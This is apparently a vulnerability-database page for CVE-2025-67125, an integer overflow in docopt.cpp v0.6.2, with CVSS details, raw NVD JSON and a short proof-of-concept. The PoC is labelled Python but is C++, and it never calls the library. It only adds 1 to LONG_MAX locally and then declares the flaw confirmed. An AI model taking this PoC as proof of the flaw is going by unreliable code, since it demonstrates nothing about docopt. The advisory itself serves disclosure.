Security Vulnerability Report
中文
CVE-2025-67125 CVSS 4.4 MEDIUM

CVE-2025-67125

Published: 2026-01-23 16:15:52
Last Modified: 2026-02-11 19:44:52
Source: [email protected]

Description

A signed integer overflow in docopt.cpp v0.6.2 (LeafPattern::match in docopt_private.h) when merging occurrence counters (e.g., default LONG_MAX + first user "-v/--verbose") can cause counter wrap (negative/unbounded semantics) and lead to logic/policy bypass in applications that rely on occurrence-based limits, rate-gating, or safety toggles. In hardened builds (e.g., UBSan or -ftrapv), the overflow may also result in process abort (DoS).

CVSS Details

CVSS Score
4.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:docopt:docopt.cpp:0.6.2:*:*:*:*:*:*:* - VULNERABLE
docopt.cpp < 0.6.2 (v0.6.2 affected)
docopt.cpp v0.6.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* * CVE-2025-67125 PoC - docopt.cpp Signed Integer Overflow * This PoC demonstrates the occurrence counter overflow in LeafPattern::match * * Build: g++ -o poc poc.cpp -ldocopt * Run: ./poc -v -v -v -v -v ... */ #include <iostream> #include <climits> #include <docopt.h> static const char USAGE[] = R"(CVE-2025-67125 PoC Usage: poc [-v | --verbose]... poc (-h | --help) Options: -h --help Show this help message -v --verbose Verbose mode (can be repeated) )"; int main(int argc, char* argv[]) { std::cout << "[*] CVE-2025-67125 - docopt.cpp Integer Overflow PoC\n"; std::cout << "[*] Testing occurrence counter overflow\n\n"; // Simulate the overflow condition // Default LONG_MAX + first occurrence causes overflow long occurrence_count = LONG_MAX; std::cout << "[+] Initial occurrence count: " << occurrence_count << " (LONG_MAX)\n"; // This simulates what happens in LeafPattern::match when merging counters // Adding 1 to LONG_MAX causes signed integer overflow occurrence_count += 1; std::cout << "[+] After adding 1: " << occurrence_count << " (OVERFLOW!)\n"; std::cout << "[+] Count is now negative/undefined due to signed integer overflow\n\n"; // Demonstrate impact on limit checking std::cout << "[*] Simulating limit check logic:\n"; std::cout << " if (occurrence_count > MAX_ALLOWED) { ... }\n"; const int MAX_ALLOWED = 5; if (occurrence_count > MAX_ALLOWED) { std::cout << " Result: Check would pass (count > " << MAX_ALLOWED << ")\n"; } else { std::cout << " Result: Check fails unexpectedly!\n"; std::cout << " [+] Vulnerability confirmed: overflow bypasses limit checks\n"; } std::cout << "\n[*] Note: In production with UBSan/-ftrapv, this would cause:\n"; std::cout << " - Process abort (DoS)\n"; std::cout << " - Logic bypass in occurrence-based limits\n"; return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67125", "sourceIdentifier": "[email protected]", "published": "2026-01-23T16:15:52.347", "lastModified": "2026-02-11T19:44:52.320", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A signed integer overflow in docopt.cpp v0.6.2 (LeafPattern::match in docopt_private.h) when merging occurrence counters (e.g., default LONG_MAX + first user \"-v/--verbose\") can cause counter wrap (negative/unbounded semantics) and lead to logic/policy bypass in applications that rely on occurrence-based limits, rate-gating, or safety toggles. In hardened builds (e.g., UBSan or -ftrapv), the overflow may also result in process abort (DoS)."}, {"lang": "es", "value": "Un desbordamiento de entero con signo en docopt.cpp v0.6.2 (LeafPattern::match en docopt_private.h) al fusionar contadores de ocurrencias (p. ej., LONG_MAX predeterminado + primer usuario '-v/--verbose') puede causar un 'counter wrap' (semántica negativa/ilimitada) y conducir a una omisión de lógica/política en aplicaciones que dependen de límites basados en ocurrencias, control de velocidad ('rate-gating') o interruptores de seguridad. En compilaciones reforzadas (p. ej., UBSan o -ftrapv), el desbordamiento también puede resultar en la interrupción del proceso (DoS)."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:docopt:docopt.cpp:0.6.2:*:*:*:*:*:*:*", "matchCriteriaId": "A1D13AD8-8BF4-46C4-8993-776E11D9151C"}]}]}], "references": [{"url": "https://gist.github.com/thesmartshadow/672afe8828844c833f46f8ebe2f5f3bd", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/docopt/docopt.cpp", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.